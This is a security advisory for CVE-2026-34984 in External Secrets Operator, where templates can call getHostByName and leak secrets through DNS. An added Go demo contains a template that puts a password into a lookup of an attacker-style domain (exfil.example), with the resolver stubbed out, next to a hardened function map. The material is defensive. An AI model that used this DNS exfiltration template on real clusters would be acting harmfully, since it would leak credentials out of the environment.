PT-2026-32571 · Unknown · External Secrets Operator

Kodareef5 · Published 2026-04-13 · Updated 2026-04-15 · CVE-2026-34984

CVSS v4.0: 7.1 (High)
Vector: AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N
Name of the Vulnerable Software and Affected Versions: External Secrets Operator versions prior to 2.3.0

Description: The v2 template engine in runtime/template/v2/template.go removes env and expandenv from the sprig TxtFuncMap() but leaves the getHostByName() function reachable from user-controlled templates. Because the controller executes templates inside its own process, anyone who can create or update a templated ExternalSecret can make the controller perform DNS lookups for names derived from secret values, for example by embedding a secret value as a label under a domain whose nameserver the attacker observes. This yields a DNS exfiltration primitive: secret material leaves the cluster inside the controller's DNS queries, so the attacker's own workload needs no outbound network access. The result is a loss of confidentiality in environments where lower-trust users are allowed to author these resources and the controller (or the cluster resolver it uses) can resolve external names.

Recommendations: Update to version 2.3.0 or later. Until the upgrade is applied, use RBAC to restrict the ability of untrusted or lower-trust users to create or update templated ExternalSecret resources, and treat any DNS egress from the controller as a potential exfiltration path.
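The following Go program is an added example, not code from the External Secrets Operator project. It models the pattern the description names: a sprig-style function map from which env and expandenv have been removed while getHostByName remains, a template that feeds a secret value into that function, and one hardening (also dropping getHostByName) placed beside it. Assumptions: sprig is not imported, so a small stand-in map replaces sprig.TxtFuncMap(); the resolver is a recording stub rather than net.LookupHost, so nothing is actually resolved; the secret value, the template and the domain exfil.example are constructed for illustration; and the project's real 2.3.0 fix may differ from the hardening shown.

```go
package main

import (
	"bytes"
	"encoding/base64"
	"fmt"
	"os"
	"strings"
	"text/template"
)

// lookups records every hostname the template engine asked the resolver for.
// It stands in for the controller's real DNS traffic so the example runs offline.
var lookups []string

// resolver is the hook getHostByName calls. Here it is a recording stub that
// answers with a documentation address; a production build would point it at
// net.LookupHost, which is exactly the controller-side lookup the advisory describes.
var resolver = func(host string) ([]string, error) {
	lookups = append(lookups, host)
	return []string{"203.0.113.1"}, nil
}

// baseFuncMap is a small stand-in for sprig.TxtFuncMap() (assumption: sprig is
// not imported so the example has no external dependency). It mixes harmless
// helpers with the three process-interacting functions named in the advisory.
func baseFuncMap() template.FuncMap {
	return template.FuncMap{
		"upper":     strings.ToUpper,
		"b64enc":    func(s string) string { return base64.StdEncoding.EncodeToString([]byte(s)) },
		"env":       os.Getenv,
		"expandenv": os.ExpandEnv,
		"getHostByName": func(host string) string {
			addrs, err := resolver(host)
			if err != nil || len(addrs) == 0 {
				return ""
			}
			return addrs[0]
		},
	}
}

// vulnerableFuncMap mirrors the pre-2.3.0 v2 engine as described: env and
// expandenv are dropped, getHostByName is left in.
func vulnerableFuncMap() template.FuncMap {
	m := baseFuncMap()
	delete(m, "env")
	delete(m, "expandenv")
	return m
}

// hardenedFuncMap is one way to close the gap (assumption: the project's own
// 2.3.0 fix may differ): drop getHostByName as well, so no template function
// can reach the resolver at all.
func hardenedFuncMap() template.FuncMap {
	m := vulnerableFuncMap()
	delete(m, "getHostByName")
	return m
}

// render executes a user-authored template against secret data with the given
// function map, in-process, as the controller does.
func render(funcs template.FuncMap, tmpl string, data map[string]string) (string, error) {
	t, err := template.New("es").Funcs(funcs).Option("missingkey=error").Parse(tmpl)
	if err != nil {
		return "", err
	}
	var buf bytes.Buffer
	if err := t.Execute(&buf, data); err != nil {
		return "", err
	}
	return buf.String(), nil
}

// exfilTemplate is a constructed illustration of the primitive: the secret value
// becomes a DNS label under a domain the template author controls. exfil.example
// is a reserved example name and nothing is resolved, because resolver is a stub.
const exfilTemplate = `{{ getHostByName (printf "%s.exfil.example" .password) }}`

func main() {
	data := map[string]string{"password": "hunter2"} // constructed sample secret

	lookups = nil
	out, err := render(vulnerableFuncMap(), exfilTemplate, data)
	fmt.Printf("vulnerable: out=%q err=%v lookups=%v\n", out, err, lookups)

	lookups = nil
	out, err = render(hardenedFuncMap(), exfilTemplate, data)
	fmt.Printf("hardened:   out=%q err=%v lookups=%v\n", out, err, lookups)
}
```

With the vulnerable map the template renders and the resolver is asked for hunter2.exfil.example, which is the leak: the query carries the secret regardless of what the rendered output contains. With the hardened map text/template rejects the template at parse time because getHostByName is not defined, so no lookup is ever attempted. The same check is useful when auditing any in-process template engine: enumerate the function map and ask which entries can reach the network, the filesystem or the environment, rather than denylisting the two or three you already know about.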

Fix

Information Disclosure

Weakness Enumeration

Related Identifiers

CVE-2026-34984
GHSA-R2PG-R6H7-CRF3

Affected Products

External Secrets Operator